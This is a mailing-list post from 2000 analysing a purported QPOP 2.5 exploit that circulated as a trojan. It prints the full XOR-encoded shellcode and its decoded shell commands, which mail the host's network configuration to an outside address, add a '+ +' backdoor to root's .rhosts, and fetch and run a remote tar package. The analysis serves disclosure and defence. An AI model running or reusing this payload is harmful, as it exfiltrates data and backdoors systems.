Re: QPOP2.5* exploit ??

[dim () XS4ALL NL (Dimitry Andric)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 2000-05-14 at 12:30 Ryan Sweat wrote:

> this has been found in the wild, however there seems to be a trojan
> in the shellcode.  Popper 2.5* has been thought to be safe.  I would
> not reccomend running this on your own machine unless you crack the
> shellcode and see what it does.

- --snip--

> char shellcode[] =
> "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9
> \x8c\x01\x8 0\x36\x02\x46\xe2\xfa"
> "\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f"
> "\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92
> \x92\x2d"
> "\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22
> \x7e\x22"
> "\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76
> \x61\x6d"
> "\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c
> \x3c\x22"
> "\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25
> \x29\x22"
> "\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71
> \x76\x71"
> "\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c
> \x76\x70"
> "\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d
> \x6d\x6e"
> "\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c
> \x76\x63"
> "\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70
> \x22\x2f"
> "\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66
> \x67\x74"
> "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39
> \x22\x61"
> "\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a
> \x39\x22"
> "\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66
> \x67\x74"
> "\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22
> \x2f\x70"
> "\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02
> \x57\x8b"
> "\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02
> \x02\x8f"
> "\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6
> \x8f\x81"
> "\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2
> \xba\x09"
> "\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c
> \xcb\xc1" "\x92\x92";

This code un-xors itself, then runs "sh -c" with the following
commands:

/sbin/ifconfig -a | mail -s solwaretcownz () hotmail com >> /dev/null;
echo '+ +' >> ~root/.rhosts;
rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar;
tar -xvf solwar* >> /dev/null;
cd solwar;
chmod +x solwar.sh;
./solwar.sh >> /dev/null;
cd ..;
rm -rf solwar*;

So this:
1. Mails your IP configuration to <solwaretcownz () hotmail com>,
whoever that may be.
2. Adds '+ +' to your root's .rhosts file
3. Downloads a tar file from skinner.trdlnk.com and extracts it
4. Runs the solwar.sh script inside
5. Removes the extracted stuff

I haven't been able to check out the tar file, since my rcp says:
"rcp: /usr/spool/lp/model/solwar.tar: No such file or directory". Has
anybody else been able to download it? Please mail it (or the
relevant parts) to me and/or the list.

Cheers,
- --
Dimitry Andric <dim () xs4all nl>
PGP key: http://www.xs4all.nl/~dim/dim.asc
KeyID: 4096/1024-0x2E2096A3
Fingerprint: 7AB4 62D2 CE35 FC6D 4239 4FCD B05E A30A 2E20 96A3

-----BEGIN PGP SIGNATURE-----
Version: Encrypted with PGP Plugin for Calypso
Comment: http://www.gn.apc.org/duncan/stoa_cover.htm

iQA/AwUBOR8W6rBeowouIJajEQJFOgCbBtm/xDxN90UD5thG5KVpjmMXhxcAnRzO
VUGf8xqmZeB57Xzid9UgH5nE
=KVuP
-----END PGP SIGNATURE-----